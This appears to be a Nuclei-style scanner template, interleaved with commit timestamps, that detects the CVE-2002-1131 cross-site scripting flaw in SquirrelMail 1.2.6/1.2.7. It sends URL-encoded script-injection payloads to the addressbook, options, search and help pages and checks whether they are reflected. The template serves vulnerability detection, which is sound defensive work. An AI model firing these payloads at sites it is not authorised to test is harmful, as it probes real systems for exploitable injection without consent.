2021-11-15 18:09:04 +00:00
id : CVE-2002-1131
info :
2022-08-16 14:14:41 +00:00
name : SquirrelMail 1.2.6/1.2.7 - Cross-Site Scripting
2021-11-15 18:09:04 +00:00
author : dhiyaneshDk
severity : medium
2022-08-16 14:14:41 +00:00
description : The Virtual Keyboard plugin for SquirrelMail 1.2.6/1.2.7 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
2022-04-22 10:38:41 +00:00
reference :
2022-07-01 10:02:07 +00:00
- http://www.redhat.com/support/errata/RHSA-2002-204.html
- http://www.debian.org/security/2002/dsa-191
- http://sourceforge.net/project/shownotes.php?group_id=311&release_id=110774
2022-04-22 10:38:41 +00:00
- https://www.exploit-db.com/exploits/21811
2022-06-07 20:50:59 +00:00
- https://web.archive.org/web/20051124131714/http://archives.neohapsis.com/archives/bugtraq/2002-09/0246.html
- http://web.archive.org/web/20210129020617/https://www.securityfocus.com/bid/5763/
2022-08-16 14:14:41 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2002-1131
2022-04-01 08:51:42 +00:00
classification :
2023-04-28 13:11:35 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score : 5.4
cwe-id : CWE-80
2022-04-01 08:51:42 +00:00
cve-id : CVE-2002-1131
2022-08-27 04:41:18 +00:00
tags : cve2002,edb,xss,squirrelmail,cve
2023-04-28 08:11:21 +00:00
metadata :
max-request : 5
2021-11-15 18:09:04 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-11-15 18:09:04 +00:00
- method : GET
path :
2021-11-16 10:10:56 +00:00
- '{{BaseURL}}/src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
- '{{BaseURL}}/src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
- '{{BaseURL}}/src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search'
- '{{BaseURL}}/src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search'
- '{{BaseURL}}/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2021-11-15 18:09:04 +00:00
2021-11-16 10:10:56 +00:00
stop-at-first-match : true
2021-11-15 18:09:04 +00:00
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
part : body
2021-11-16 10:10:56 +00:00
words :
- "</script><script>alert(document.domain)</script>"
2021-11-15 18:09:04 +00:00
- type : word
2021-11-16 10:10:56 +00:00
part : header
2021-11-15 18:09:04 +00:00
words :
- "text/html"